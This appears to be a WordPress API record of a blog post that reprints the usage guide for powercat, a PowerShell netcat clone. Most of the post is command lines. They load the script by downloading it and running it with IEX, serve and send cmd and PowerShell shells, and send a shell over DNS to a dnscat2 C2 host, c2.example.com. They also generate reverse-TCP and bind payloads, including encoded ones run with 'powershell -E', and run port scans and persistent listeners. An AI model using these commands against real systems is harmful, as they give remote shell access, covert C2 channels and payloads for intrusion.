{"id":2656,"date":"2015-10-27T05:33:02","date_gmt":"2015-10-27T05:33:02","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2656"},"modified":"2015-10-27T05:33:02","modified_gmt":"2015-10-27T05:33:02","slug":"powercat-the-powershell-version-netcat","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2656","title":{"rendered":"Powercat &#8211; The Powershell Version [Netcat]"},"content":{"rendered":"<p><strong>Powercat<\/strong> is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.<\/p>\n<pre class=\"\">Load The Function From Downloaded .ps1 File:\n    . .\\powercat.ps1\nLoad The Function From URL:\n    IEX (New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1')\n<\/pre>\n<p><strong>Parameters:<\/strong><\/p>\n<pre>-l      Listen for a connection.                             [Switch]\n-c      Connect to a listener.                               [String]\n-p      The port to connect to, or listen on.                [String]\n-e      Execute. (GAPING_SECURITY_HOLE)                      [String]\n-ep     Execute Powershell.                                  [Switch]\n-r      Relay. Format: \"-r tcp:10.1.1.1:443\"                 [String]\n-u      Transfer data over UDP.                              [Switch]\n-dns    Transfer data over dns (dnscat2).                    [String]\n-dnsft  DNS Failure Threshold.                               [int32]\n-t      Timeout option. Default: 60                          [int32]\n-i      Input: Filepath (string), byte array, or string.     [object]\n-o      Console Output Type: \"Host\", \"Bytes\", or \"String\"    [String]\n-of     Output File Path.                                    [String]\n-d      Disconnect after connecting.                         [Switch]\n-rep    Repeater. Restart after disconnecting.               [Switch]\n-g      Generate Payload.                                    [Switch]\n-ge     Generate Encoded Payload.                            [Switch]\n-h      Print the help message.                              [Switch]\n<\/pre>\n<p><strong>Basic Connections<\/strong><br \/>\nBy default, powercat reads input from the console and writes input to the console using write-host. You can change the output type to &#8216;Bytes&#8217;, or &#8216;String&#8217; with -o.<\/p>\n<pre>Basic Client:\n    powercat -c 10.1.1.1 -p 443\nBasic Listener:\n    powercat -l -p 8000\nBasic Client, Output as Bytes:\n    powercat -c 10.1.1.1 -p 443 -o Bytes\n<\/pre>\n<p><strong><br \/>\nFile Transfer<\/strong><br \/>\npowercat can be used to transfer files back and forth using -i (Input) and -of (Output File).<\/p>\n<pre>Send File:\n    powercat -c 10.1.1.1 -p 443 -i C:\\inputfile\nRecieve File:\n    powercat -l -p 8000 -of C:\\inputfile\n<\/pre>\n<p><strong>Shells<\/strong><br \/>\npowercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.<\/p>\n<pre>Serve a cmd Shell:\n    powercat -l -p 443 -e cmd\nSend a cmd Shell:\n    powercat -c 10.1.1.1 -p 443 -e cmd\nServe a shell which executes powershell commands:\n    powercat -l -p 443 -ep\n<\/pre>\n<p><strong>DNS and UDP<\/strong><br \/>\npowercat supports more than sending data over TCP. Specify -u to enable UDP Mode. Data can also be sent to a dnscat2 server with -dns.<\/p>\n<pre>Send Data Over UDP:\n    powercat -c 10.1.1.1 -p 8000 -u\n    powercat -l -p 8000 -u\nConnect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:\n    powercat -c 10.1.1.1 -p 53 -dns c2.example.com\nSend a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:\n    powercat -dns c2.example.com -e cmd<\/pre>\n<p><strong>Relays<\/strong><br \/>\nRelays in powercat work just like traditional netcat relays, but you don&#8217;t have to create a file or start a second process. You can also relay data between connections of different protocols.<\/p>\n<pre>TCP Listener to TCP Client Relay:\n    powercat -l -p 8000 -r tcp:10.1.1.16:443\nTCP Listener to UDP Client Relay:\n    powercat -l -p 8000 -r udp:10.1.1.16:53\nTCP Listener to DNS Client Relay\n    powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com\nTCP Listener to DNS Client Relay using the Windows Default DNS Server\n    powercat -l -p 8000 -r dns:::c2.example.com\nTCP Client to Client Relay\n    powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443\nTCP Listener to Listener Relay\n    powercat -l -p 8000 -r tcp:9000\n<\/pre>\n<p><strong>Generate Payloads<\/strong><br \/>\nPayloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don&#8217;t want to use all of powercat.<\/p>\n<pre class=\"\">Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:\n    powercat -c 10.1.1.15 -p 443 -e cmd -g\nGenerate a bind tcp encoded command which listens on port 8000:\n    powercat -l -p 8000 -e cmd -ge\n<\/pre>\n<p><strong>Misc Usage<\/strong><br \/>\npowercat can also be used to perform portscans, and start persistent servers.<\/p>\n<pre>Basic TCP Port Scanner:\n    (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}\nStart A Persistent Server That Serves a File:\n    powercat -l -p 443 -i C:\\inputfile -rep\n<\/pre>\n<p style=\"text-align: center;\"><a href=\"https:\/\/github.com\/besimorhino\/powercat\" target=\"_blank\" rel=\"noopener noreferrer\">Download Powercat at Github<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts. Load The Function From Downloaded .ps1 File: . .\\powercat.ps1 Load The Function From URL: IEX (New-Object System.Net.Webclient).DownloadString(&#8216;https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1&#8217;) Parameters:<\/p>\n","protected":false},"author":1,"featured_media":2657,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63],"tags":[600,102],"class_list":["post-2656","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-windows","tag-netcat","tag-powershell"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2656"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}